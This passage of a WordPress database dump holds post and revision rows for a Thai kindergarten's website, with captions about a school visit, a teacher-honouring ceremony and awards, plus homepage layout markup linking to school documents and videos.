(556,1,'2025-06-27 14:32:53','2025-06-27 07:32:53','<!-- wp:image {\"id\":553,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/510226912_122233485428202781_3363047737425267891_n-2-724x1024.jpg\" alt=\"\" class=\"wp-image-553\"/></figure>\n<!-- /wp:image -->','ท่านดร.สุวิทย์ มังคละ รองอธิบดีกรมอาเซียน กระทรวงการต่างประเทศ พร้อมคณะ ที่ได้ให้เกียรติมาตรวจเยี่ยมห้องสมุดอาเซียน ซึ่งเป็นห้องสมุดแห่งที่ 44 ในโครงการห้องสมุดอาเซียน : 1 จังหวัด 1 โรงเรียน 1 ห้องสมุดอาเซียน','','inherit','closed','closed','','552-revision-v1','','','2025-06-27 14:32:53','2025-06-27 07:32:53','',552,'http://watprato.ssk.in.th/?p=556',0,'revision','',0),
(557,1,'2025-06-27 14:34:44','2025-06-27 07:34:44','<!-- wp:image {\"id\":550,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/509590616_122233204442202781_5742782962099935264_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-550\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้จัดพิธีไหว้ครู ประจำปีการศึกษา 2568','','inherit','closed','closed','','549-revision-v1','','','2025-06-27 14:34:44','2025-06-27 07:34:44','',549,'http://watprato.ssk.in.th/?p=557',0,'revision','',0),
(558,1,'2025-06-27 14:35:47','2025-06-27 07:35:47','<!-- wp:image {\"id\":547,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508860809_122233022552202781_5930562876512911766_n-724x1024.jpg\" alt=\"\" class=\"wp-image-547\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโต ได้รับรางวัล “สถานศึกษาที่มีการปฏิบัติที่เป็นเลิศ” และนางรำไพ อดทน ได้รับรางวัล “รองผู้อำนวยการสถานศึกษาดีเด่น ด้านผลงานวิชาการที่เป็นเลิศ” ซึ่งรับเกียรติบัตรจาก ว่าที่ร้อยตรีธนุ วงษ์จินดา เลขาธิการคณะกรรมการการศึกษาขั้นพื้นฐาน','','inherit','closed','closed','','546-revision-v1','','','2025-06-27 14:35:47','2025-06-27 07:35:47','',546,'http://watprato.ssk.in.th/?p=558',0,'revision','',0),
(560,1,'2025-06-27 14:40:23','2025-06-27 07:40:23','','EIT_QRCode (2)','','inherit','open','closed','','eit_qrcode-2-2','','','2025-06-27 14:40:23','2025-06-27 07:40:23','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png',0,'attachment','image/png',0),
(561,1,'2025-06-27 14:40:31','2025-06-27 07:40:31','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f 